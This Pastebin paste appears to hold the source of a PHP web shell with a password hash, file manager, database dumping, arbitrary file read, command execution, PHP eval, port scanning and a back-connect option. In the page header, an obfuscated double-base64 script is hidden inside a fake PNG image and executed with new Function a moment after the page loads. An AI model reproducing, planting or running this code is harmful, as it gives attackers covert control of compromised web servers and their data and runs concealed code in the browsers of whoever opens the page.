SHARE
TWEET

Untitled

redbraker699 May 23rd, 2018 57 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. <?php
 2. error_reporting(7);
 3. @set_magic_quotes_runtime(0);
 4. ob_start();
 5. $mtime = explode(' ', microtime());
 6. $starttime = $mtime[1] + $mtime[0];
 7. define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
 8. define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
 9. define('IS_COM', class_exists('COM') ? 1 : 0 );
 10. define('IS_GPC', get_magic_quotes_gpc());
 11. $dis_func = get_cfg_var('disable_functions');
 12. define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
 13. @set_time_limit(0);
 14.  
 15. foreach($_POST as $key => $value) {
 16.     if (IS_GPC) {
 17.         $value = s_array($value);
 18.     }
 19.     $$key = $value;
 20. }
 21. /*===================== ³ÌÐòÅäÖà =====================*/
 22.  
 23. //echo encode_pass('angel');exit;
 24. //angel = ec38fe2a8497e0a8d6d349b3533038cb
 25. // Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
 26. $pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
 27.  
 28. //ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
 29. // cookie ǰ׺
 30. $cookiepre = '';
 31. // cookie ×÷ÓÃÓò
 32. $cookiedomain = '';
 33. // cookie ×÷Ó÷¾¶
 34. $cookiepath = '/';
 35. // cookie ÓÐЧÆÚ
 36. $cookielife = 86400;
 37.  
 38. //³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
 39. !$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
 40. /*===================== ÅäÖýáÊø =====================*/
 41.  
 42. $charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
 43. if ($charset == 'utf8') {
 44.     header("content-Type: text/html; charset=utf-8");
 45. } elseif ($charset == 'big5') {
 46.     header("content-Type: text/html; charset=big5");
 47. } elseif ($charset == 'gbk') {
 48.     header("content-Type: text/html; charset=gbk");
 49. } elseif ($charset == 'latin1') {
 50.     header("content-Type: text/html; charset=iso-8859-2");
 51. } elseif ($charset == 'euc-kr') {
 52.     header("content-Type: text/html; charset=euc-kr");
 53. } elseif ($charset == 'euc-jp') {
 54.     header("content-Type: text/html; charset=euc-jp");
 55. }
 56.  
 57. $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
 58. $timestamp = time();
 59.  
 60. /*===================== Éí·ÝÑéÖ¤ =====================*/
 61. if ($action == "logout") {
 62.     scookie('loginpass', '', -86400 * 365);
 63.     @header('Location: '.$self);
 64.     exit;
 65. }
 66. if($pass) {
 67.     if ($action == 'login') {
 68.         if ($pass == encode_pass($password)) {
 69.             scookie('loginpass',encode_pass($password));
 70.             @header('Location: '.$self);
 71.             exit;
 72.         }
 73.     }
 74.     if ($_COOKIE['loginpass']) {
 75.         if ($_COOKIE['loginpass'] != $pass) {
 76.             loginpage();
 77.         }
 78.     } else {
 79.         loginpage();
 80.     }
 81. }
 82. /*===================== ÑéÖ¤½áÊø =====================*/
 83.  
 84. $errmsg = '';
 85. !$action && $action = 'file';
 86.  
 87. // ²é¿´PHPINFO
 88. if ($action == 'phpinfo') {
 89.     if (IS_PHPINFO) {
 90.         phpinfo();
 91.         exit;
 92.     } else {
 93.         $errmsg = 'phpinfo() function has non-permissible';
 94.     }
 95. }
 96.  
 97. // ÏÂÔØÎļþ
 98. if ($doing == 'downfile' && $thefile) {
 99.     if (!@file_exists($thefile)) {
 100.         $errmsg = 'The file you want Downloadable was nonexistent';
 101.     } else {
 102.         $fileinfo = pathinfo($thefile);
 103.         header('Content-type: application/x-'.$fileinfo['extension']);
 104.         header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
 105.         header('Content-Length: '.filesize($thefile));
 106.         @readfile($thefile);
 107.         exit;
 108.     }
 109. }
 110.  
 111. // Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
 112. if ($doing == 'backupmysql' && !$saveasfile) {
 113.     if (!$table) {
 114.         $errmsg ='Please choose the table';
 115.     } else {
 116.         $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 117.         $filename = basename($dbname.'.sql');
 118.         header('Content-type: application/unknown');
 119.         header('Content-Disposition: attachment; filename='.$filename);
 120.         foreach($table as $k => $v) {
 121.             if ($v) {
 122.                 sqldumptable($v);
 123.             }
 124.         }
 125.         mysql_close();
 126.         exit;
 127.     }
 128. }
 129.  
 130. // ͨ¹ýMYSQLÏÂÔØÎļþ
 131. if($doing=='mysqldown'){
 132.     if (!$dbname) {
 133.         $errmsg = 'Please input dbname';
 134.     } else {
 135.         $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 136.         if (!file_exists($mysqldlfile)) {
 137.             $errmsg = 'The file you want Downloadable was nonexistent';
 138.         } else {
 139.             $result = q("select load_file('$mysqldlfile');");
 140.             if(!$result){
 141.                 q("DROP TABLE IF EXISTS tmp_angel;");
 142.                 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
 143.                 //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
 144.                 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
 145.                 $result = q("select content from tmp_angel");
 146.                 q("DROP TABLE tmp_angel");
 147.             }
 148.             $row = @mysql_fetch_array($result);
 149.             if (!$row) {
 150.                 $errmsg = 'Load file failed '.mysql_error();
 151.             } else {
 152.                 $fileinfo = pathinfo($mysqldlfile);
 153.                 header('Content-type: application/x-'.$fileinfo['extension']);
 154.                 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
 155.                 header("Accept-Length: ".strlen($row[0]));
 156.                 echo $row[0];
 157.                 exit;
 158.             }
 159.         }
 160.     }
 161. }
 162.  
 163. ?>
 164. <html>
 165. <head>
 166. <meta http-equiv="Content-Type" content="text/html; charset=gbk">
 167. <title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
 168. <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
 169. <style type="text/css">
 170. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
 171. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
 172. .area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
 173. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
 174. a {color: #00f;text-decoration:underline;}
 175. a:hover{color: #f00;text-decoration:none;}
 176. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
 177. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
 178. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
 179. .head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
 180. .head td span{font-weight:normal;}
 181. .infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
 182. form{margin:0;padding:0;}
 183. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
 184. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
 185. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
 186. .drives{padding:5px;}
 187. .drives span {margin:auto 7px;}
 188. </style>
 189. <script type="text/javascript">
 190. if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
 191. setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500);
 192. </script>
 193. <script type="text/javascript">
 194. function CheckAll(form) {
 195.     for(var i=0;i<form.elements.length;i++) {
 196.         var e = form.elements[i];
 197.         if (e.name != 'chkall')
 198.         e.checked = form.chkall.checked;
 199.     }
 200. }
 201. function $(id) {
 202.     return document.getElementById(id);
 203. }
 204. function createdir(){
 205.     var newdirname;
 206.     newdirname = prompt('Please input the directory name:', '');
 207.     if (!newdirname) return;
 208.     $('createdir').newdirname.value=newdirname;
 209.     $('createdir').submit();
 210. }
 211. function fileperm(pfile){
 212.     var newperm;
 213.     newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
 214.     if (!newperm) return;
 215.     $('fileperm').newperm.value=newperm;
 216.     $('fileperm').pfile.value=pfile;
 217.     $('fileperm').submit();
 218. }
 219. function copyfile(sname){
 220.     var tofile;
 221.     tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
 222.     if (!tofile) return;
 223.     $('copyfile').tofile.value=tofile;
 224.     $('copyfile').sname.value=sname;
 225.     $('copyfile').submit();
 226. }
 227. function rename(oldname){
 228.     var newfilename;
 229.     newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
 230.     if (!newfilename) return;
 231.     $('rename').newfilename.value=newfilename;
 232.     $('rename').oldname.value=oldname;
 233.     $('rename').submit();
 234. }
 235. function dofile(doing,thefile,m){
 236.     if (m && !confirm(m)) {
 237.         return;
 238.     }
 239.     $('filelist').doing.value=doing;
 240.     if (thefile){
 241.         $('filelist').thefile.value=thefile;
 242.     }
 243.     $('filelist').submit();
 244. }
 245. function createfile(nowpath){
 246.     var filename;
 247.     filename = prompt('Please input the file name:', '');
 248.     if (!filename) return;
 249.     opfile('editfile',nowpath + filename,nowpath);
 250. }
 251. function opfile(action,opfile,dir){
 252.     $('fileopform').action.value=action;
 253.     $('fileopform').opfile.value=opfile;
 254.     $('fileopform').dir.value=dir;
 255.     $('fileopform').submit();
 256. }
 257. function godir(dir,view_writable){
 258.     if (view_writable) {
 259.         $('godir').view_writable.value=view_writable;
 260.     }
 261.     $('godir').dir.value=dir;
 262.     $('godir').submit();
 263. }
 264. function getsize(getdir,dir){
 265.     $('getsize').getdir.value=getdir;
 266.     $('getsize').dir.value=dir;
 267.     $('getsize').submit();
 268. }
 269. function editrecord(action, base64, tablename){
 270.     if (action == 'del') {     
 271.         if (!confirm('Is or isn\'t deletion record?')) return;
 272.     }
 273.     $('recordlist').doing.value=action;
 274.     $('recordlist').base64.value=base64;
 275.     $('recordlist').tablename.value=tablename;
 276.     $('recordlist').submit();
 277. }
 278. function moddbname(dbname) {
 279.     if(!dbname) return;
 280.     $('setdbname').dbname.value=dbname;
 281.     $('setdbname').submit();
 282. }
 283. function settable(tablename,doing,page) {
 284.     if(!tablename) return;
 285.     if (doing) {
 286.         $('settable').doing.value=doing;
 287.     }
 288.     if (page) {
 289.         $('settable').page.value=page;
 290.     }
 291.     $('settable').tablename.value=tablename;
 292.     $('settable').submit();
 293. }
 294. function s(action,nowpath,p1,p2,p3,p4,p5) {
 295.     if(action) $('opform').action.value=action;
 296.     if(nowpath) $('opform').nowpath.value=nowpath;
 297.     if(p1) $('opform').p1.value=p1;
 298.     if(p2) $('opform').p2.value=p2;
 299.     if(p3) $('opform').p3.value=p3;
 300.     if(p4) $('opform').p4.value=p4;
 301.     if(p5) $('opform').p4.value=p5;
 302. }
 303. function g(action,nowpath,p1,p2,p3,p4,p5) {
 304.     if(!action) return;
 305.     s(action,nowpath,p1,p2,p3,p4,p5);
 306.     $('opform').submit();
 307. }
 308. </script>
 309. </head>
 310. <body style="margin:0;table-layout:fixed; word-break:break-all">
 311. <?php
 312. formhead(array('name'=>'opform'));
 313. makehide('action', $action);
 314. makehide('nowpath', $nowpath);
 315. makehide('p1', $p1);
 316. makehide('p2', $p2);
 317. makehide('p3', $p3);
 318. makehide('p4', $p4);
 319. makehide('p5', $p5);
 320. formfoot();
 321.  
 322. if(!function_exists('posix_getegid')) {
 323.     $user = @get_current_user();
 324.     $uid = @getmyuid();
 325.     $gid = @getmygid();
 326.     $group = "?";
 327. } else {
 328.     $uid = @posix_getpwuid(@posix_geteuid());
 329.     $gid = @posix_getgrgid(@posix_getegid());
 330.     $user = $uid['name'];
 331.     $uid = $uid['uid'];
 332.     $group = $gid['name'];
 333.     $gid = $gid['gid'];
 334. }
 335.  
 336. ?>
 337. <table width="100%" border="0" cellpadding="0" cellspacing="0">
 338.     <tr class="head">
 339.         <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
 340.     </tr>
 341.     <tr class="alt1">
 342.         <td>
 343.             <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
 344.             <a href="javascript:g('logout');">Logout</a> |
 345.             <a href="javascript:g('file');">File Manager</a> |
 346.             <a href="javascript:g('mysqladmin');">MYSQL Manager</a> |
 347.             <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> |
 348.             <a href="javascript:g('shell');">Execute Command</a> |
 349.             <a href="javascript:g('phpenv');">PHP Variable</a> |
 350.             <a href="javascript:g('portscan');">Port Scan</a> |
 351.             <a href="javascript:g('secinfo');">Security information</a> |
 352.             <a href="javascript:g('eval');">Eval PHP Code</a>
 353.             <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
 354.         </td>
 355.     </tr>
 356. </table>
 357. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
 358. <?php
 359. $errmsg && m($errmsg);
 360.  
 361. // »ñÈ¡µ±Ç°Â·¾¶
 362. if (!$dir) {
 363.     $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
 364. }
 365. $nowpath = getPath(SA_ROOT, $dir);
 366. if (substr($dir, -1) != '/') {
 367.     $dir = $dir.'/';
 368. }
 369.  
 370. if ($action == 'file') {
 371.  
 372.     // Åж϶ÁдÇé¿ö
 373.     $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
 374.  
 375.     // ´´½¨Ä¿Â¼
 376.     if ($newdirname) {
 377.         $mkdirs = $nowpath.$newdirname;
 378.         if (file_exists($mkdirs)) {
 379.             m('Directory has already existed');
 380.         } else {
 381.             m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
 382.             @chmod($mkdirs,0777);
 383.         }
 384.     }
 385.  
 386.     // ÉÏ´«Îļþ
 387.     elseif ($doupfile) {
 388.         m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
 389.     }
 390.  
 391.     // ±à¼­Îļþ
 392.     elseif ($editfilename && $filecontent) {
 393.         $fp = @fopen($editfilename,'w');
 394.         m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
 395.         @fclose($fp);
 396.     }
 397.  
 398.     // ±à¼­ÎļþÊôÐÔ
 399.     elseif ($pfile && $newperm) {
 400.         if (!file_exists($pfile)) {
 401.             m('The original file does not exist');
 402.         } else {
 403.             $newperm = base_convert($newperm,8,10);
 404.             m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
 405.         }
 406.     }
 407.  
 408.     // ¸ÄÃû
 409.     elseif ($oldname && $newfilename) {
 410.         $nname = $nowpath.$newfilename;
 411.         if (file_exists($nname) || !file_exists($oldname)) {
 412.             m($nname.' has already existed or original file does not exist');
 413.         } else {
 414.             m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
 415.         }
 416.     }
 417.  
 418.     // ¸´ÖÆÎļþ
 419.     elseif ($sname && $tofile) {
 420.         if (file_exists($tofile) || !file_exists($sname)) {
 421.             m('The goal file has already existed or original file does not exist');
 422.         } else {
 423.             m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
 424.         }
 425.     }
 426.  
 427.     // ¿Ë¡ʱ¼ä
 428.     elseif ($curfile && $tarfile) {
 429.         if (!@file_exists($curfile) || !@file_exists($tarfile)) {
 430.             m('The goal file has already existed or original file does not exist');
 431.         } else {
 432.             $time = @filemtime($tarfile);
 433.             m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
 434.         }
 435.     }
 436.  
 437.     // ×Ô¶¨Òåʱ¼ä
 438.     elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
 439.         if (!@file_exists($curfile)) {
 440.             m(basename($curfile).' does not exist');
 441.         } else {
 442.             $time = strtotime("$year-$month-$day $hour:$minute:$second");
 443.             m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
 444.         }
 445.     }
 446.  
 447.     // ÅúÁ¿É¾³ýÎļþ
 448.     elseif($doing == 'delfiles') {
 449.         if ($dl) {
 450.             $dfiles='';
 451.             $succ = $fail = 0;
 452.             foreach ($dl as $filepath) {
 453.                 if (is_dir($filepath)) {
 454.                     if (@deltree($filepath)) {
 455.                         $succ++;
 456.                     } else {
 457.                         $fail++;
 458.                     }
 459.                 } else {
 460.                     if (@unlink($filepath)) {
 461.                         $succ++;
 462.                     } else {
 463.                         $fail++;
 464.                     }
 465.                 }
 466.             }
 467.             m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
 468.         } else {
 469.             m('Please select folder/file(s)');
 470.         }
 471.     }
 472.  
 473.     //²Ù×÷Íê±Ï
 474.     formhead(array('name'=>'createdir'));
 475.     makehide('newdirname');
 476.     makehide('dir',$nowpath);
 477.     formfoot();
 478.     formhead(array('name'=>'fileperm'));
 479.     makehide('newperm');
 480.     makehide('pfile');
 481.     makehide('dir',$nowpath);
 482.     formfoot();
 483.     formhead(array('name'=>'copyfile'));
 484.     makehide('sname');
 485.     makehide('tofile');
 486.     makehide('dir',$nowpath);
 487.     formfoot();
 488.     formhead(array('name'=>'rename'));
 489.     makehide('oldname');
 490.     makehide('newfilename');
 491.     makehide('dir',$nowpath);
 492.     formfoot();
 493.     formhead(array('name'=>'fileopform', 'target'=>'_blank'));
 494.     makehide('action');
 495.     makehide('opfile');
 496.     makehide('dir');
 497.     formfoot();
 498.     formhead(array('name'=>'getsize'));
 499.     makehide('getdir');
 500.     makehide('dir');
 501.     formfoot();
 502.  
 503.     $free = @disk_free_space($nowpath);
 504.     !$free && $free = 0;
 505.     $all = @disk_total_space($nowpath);
 506.     !$all && $all = 0;
 507.     $used = $all-$free;
 508.     p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
 509.  
 510.     $cwd_links = '';
 511.     $path = explode('/', $nowpath);
 512.     $n=count($path);
 513.     for($i=0;$i<$n-1;$i++) {
 514.         $cwd_links .= '<a href="javascript:godir(\'';
 515.         for($j=0;$j<=$i;$j++) {
 516.             $cwd_links .= $path[$j].'/';
 517.         }
 518.         $cwd_links .= '\');">'.$path[$i].'/</a>';
 519.     }
 520.  
 521. ?>
 522. <script type="text/javascript">
 523. document.onclick = shownav;
 524. function shownav(e){
 525.     var src = e?e.target:event.srcElement;
 526.     do{
 527.         if(src.id =="jumpto") {
 528.             $('inputnav').style.display = "";
 529.             $('pathnav').style.display = "none";
 530.             //hidenav();
 531.             return;
 532.         }
 533.         if(src.id =="inputnav") {
 534.             return;
 535.         }
 536.         src = src.parentNode;
 537.     }while(src.parentNode)
 538.  
 539.     $('inputnav').style.display = "none";
 540.     $('pathnav').style.display = "";
 541. }
 542. </script>
 543. <div style="background:#eee;margin-bottom:10px;">
 544.     <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
 545.         <tr>
 546.             <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
 547.             <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
 548.         </tr>
 549.     </table>
 550.     <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
 551.     <form action="" method="post" id="godir" name="godir">
 552.         <tr>
 553.             <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
 554.             <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
 555.             <td nowrap><input class="bt" value="GO" type="submit"></td>
 556.         </tr>
 557.     </form>
 558.     </table>
 559. <?php
 560.     if (IS_WIN && IS_COM) {
 561.         $obj = new COM('scripting.filesystemobject');
 562.         if ($obj && is_object($obj) && $obj->Drives) {
 563.             echo '<div class="drives">';
 564.             $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
 565.             $comma = '';
 566.             foreach($obj->Drives as $drive) {
 567.                 if ($drive->Path) {
 568.                     p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
 569.                     $comma = '<span>|</span>';
 570.                 }
 571.             }
 572.             echo '</div>';
 573.         }
 574.     }
 575. ?>
 576. </div>
 577. <?php
 578.     $findstr = $_POST['findstr'];
 579.     $re = $_POST['re'];
 580.     tbhead();
 581.     p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
 582.     p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
 583.     p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
 584.     p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
